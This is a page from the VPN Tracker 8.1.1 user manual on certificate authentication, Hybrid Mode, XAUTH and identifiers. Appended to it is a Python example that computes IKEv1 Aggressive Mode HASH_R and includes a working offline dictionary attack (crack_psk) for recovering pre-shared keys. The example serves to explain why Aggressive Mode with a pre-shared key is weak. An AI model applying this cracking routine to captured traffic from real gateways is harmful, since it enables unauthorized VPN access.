Extended authentication (xauth), Identifiers – equinux VPN Tracker 8.1.1 User Manual
Page 46

Certificate
The VPN client and the VPN gateway mutually authenticate using X.509 certificates (RSA signatures). This method is very secure, but requires an infrastructure for creating and distributing certificates, and a VPN gateway that supports it.
The client's certificate and private key (also called an "identity") need to be
present in the OS X keychain.
The VPN gateway's certificate can in most cases be sent by the VPN gateway and verified just as a web browser would do for HTTPS; however, it is also possible to add it to the local keychain and select that specific certificate in VPN Tracker. Selecting a specific certificate pins the gateway to that exact certificate instead of accepting any certificate that chains to a trusted CA.
Hybrid Mode
The VPN gateway authenticates itself with a certificate, and users authenticate themselves through Extended Authentication (XAUTH). This method is supported by a small number of vendors (e.g. Check Point) and is considered more secure than an Aggressive Mode connection with just a pre-shared key: in Aggressive Mode the pre-shared-key authentication hash is sent unencrypted and can be attacked offline with a dictionary, whereas in Hybrid Mode the gateway proves its identity with a signature and there is no shared secret to crack.
The VPN gateway's certificate can in most cases be sent by the VPN gateway, but it is also possible to add it to the local keychain and set that specific certificate in VPN Tracker.
Related Settings: (certificates only) Advanced > Certificates
(pre-shared key only) Advanced > Phase 1 Diffie-Hellman Group, Advanced >
Additional Settings > Credentials
Availability: According to the selected device profile.
VPN Gateway Setting: (Pre-Shared Key) Pre-shared secret, shared secret,
password, key, (Certificates) X.509 certificates, RSA signatures
Extended Authentication (XAUTH)
Extended Authentication is a way of authenticating individual users on top of one of the general authentication methods, pre-shared key or certificates (Hybrid Mode already incorporates XAUTH).
In its basic form, XAUTH asks for a username and password; however, it is also possible for the VPN gateway to ask for passcodes (such as those generated by RSA SecurID tokens) or similar one-time credentials.
It is possible to store the XAUTH username and password in the OS X keychain, or to be prompted for them every time the VPN connection is established.
XAUTH can be left set to "Automatic" even if it is actually turned off on the VPN gateway: the VPN gateway tells VPN Tracker whether XAUTH should be used or not. However, some VPN gateways need XAUTH specifically turned on or off; that is where the "Off" and "Always" settings help.
Related Settings: Advanced > Additional Settings > Credentials
Availability: According to the selected device profile.
VPN Gateway Setting: XAUTH, user authentication
Identifiers
The identifiers are small pieces of identifying information that VPN Tracker and
the VPN gateway use to recognize each other.
Related Settings: Basic > VPN Gateway (for “Remote Endpoint IP Address”)
Basic > Authentication > Certificates (for “Local/Remote Certificate”)
Availability: Identifiers are determined automatically if SonicWALL Simple
Client Provisioning is used.
VPN Gateway Setting: The local identifier from VPN Tracker's perspective is
the remote (!) identifier from the VPN gateway's perspective, and vice versa.
Therefore you will normally have to swap the identifiers configured on the
VPN gateway when entering them in VPN Tracker:
VPN Tracker                  VPN Gateway
Local Identifier:            Remote Identifier (or client/peer identifier/identity/ID)
Remote Identifier:           Local Identifier (or own/my identifier/identity/ID)
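The following example is added here to illustrate two points from this page; it is not code from the equinux manual or from VPN Tracker. First, what the identifiers actually are on the wire: the ISAKMP Identification payload body (RFC 2407), which IKEv1 feeds into its authentication hashes as IDii_b (the client's Local Identifier) and IDir_b (the gateway's Local Identifier, i.e. VPN Tracker's Remote Identifier). Second, why Aggressive Mode with only a pre-shared key is considered weaker than Hybrid Mode or certificates: the responder's HASH_R (RFC 2409, pre-shared-key authentication, HMAC-SHA1 prf) is sent unencrypted in the second Aggressive Mode message, and every other input to it is also in the clear, so anyone who captures the exchange can test candidate pre-shared keys offline. All cookies, nonces, Diffie-Hellman values and the SA payload bytes below are constructed placeholders, not a real capture.

```python
import hmac
import hashlib
import struct

# ISAKMP Identification payload ID types (RFC 2407, section 4.6.2.1).
ID_IPV4_ADDR = 1
ID_FQDN = 2
ID_USER_FQDN = 3


def id_body(id_type, data, proto=0, port=0):
    """Body of an Identification payload (everything after the generic
    payload header): ID type, protocol ID, port, identification data.
    In IKEv1 this is the IDii_b / IDir_b that is fed into the hashes."""
    if id_type == ID_IPV4_ADDR:
        data_b = bytes(int(octet) for octet in data.split("."))
    elif id_type in (ID_FQDN, ID_USER_FQDN):
        data_b = data.encode("ascii")
    else:
        raise ValueError("unsupported ID type")
    return struct.pack("!BBH", id_type, proto, port) + data_b


def prf(key, data):
    # prf for an SA negotiated with SHA-1 authentication (RFC 2409, section 4).
    return hmac.new(key, data, hashlib.sha1).digest()


def hash_r(psk, g_xr, g_xi, cky_r, cky_i, sai_b, idir_b, ni, nr):
    """HASH_R as the responder computes it for pre-shared-key authentication:
    SKEYID = prf(PSK, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)"""
    skeyid = prf(psk, ni + nr)
    return prf(skeyid, g_xr + g_xi + cky_r + cky_i + sai_b + idir_b)


# Constructed sample exchange (placeholder bytes, not a real capture). In a
# genuine Aggressive Mode exchange every value here is carried unencrypted
# in messages 1 and 2, so anyone on the path has them.
CLIENT_LOCAL_ID = id_body(ID_USER_FQDN, "alice@example.com")  # VPN Tracker "Local Identifier" (IDii_b)
GATEWAY_LOCAL_ID = id_body(ID_IPV4_ADDR, "203.0.113.1")      # VPN Tracker "Remote Identifier" (IDir_b)

EXCHANGE = dict(
    cky_i=bytes.fromhex("0011223344556677"),
    cky_r=bytes.fromhex("8899aabbccddeeff"),
    ni=bytes.fromhex("a1" * 16),
    nr=bytes.fromhex("b2" * 16),
    g_xi=bytes.fromhex("c3" * 128),   # stands in for a 1024-bit DH public value
    g_xr=bytes.fromhex("d4" * 128),
    sai_b=bytes.fromhex("00000001000000010000002c01010001"),  # stands in for SAi_b
    idir_b=GATEWAY_LOCAL_ID,          # the gateway's own identifier
)


def crack_psk(observed_hash_r, wordlist, **exch):
    """Offline dictionary attack against a captured HASH_R: recompute the
    hash for each candidate pre-shared key until one matches. No further
    traffic to the gateway is needed, so lockouts and rate limits never fire."""
    for candidate in wordlist:
        if hmac.compare_digest(hash_r(candidate.encode(), **exch), observed_hash_r):
            return candidate
    return None


if __name__ == "__main__":
    captured = hash_r(b"letmein", **EXCHANGE)   # what Aggressive Mode message 2 would carry
    print(crack_psk(captured, ["password", "vpn2014", "letmein"], **EXCHANGE))
```

Main Mode with a pre-shared key does not expose HASH_R this way, because the identity and hash payloads are only sent after the Diffie-Hellman exchange, encrypted; Hybrid Mode and certificate authentication replace the pre-shared-key hash with an RSA signature, so there is no secret for this loop to recover. The hash is only as strong as the pre-shared key, which is why a gateway that insists on Aggressive Mode with a pre-shared key should at least use a long random one.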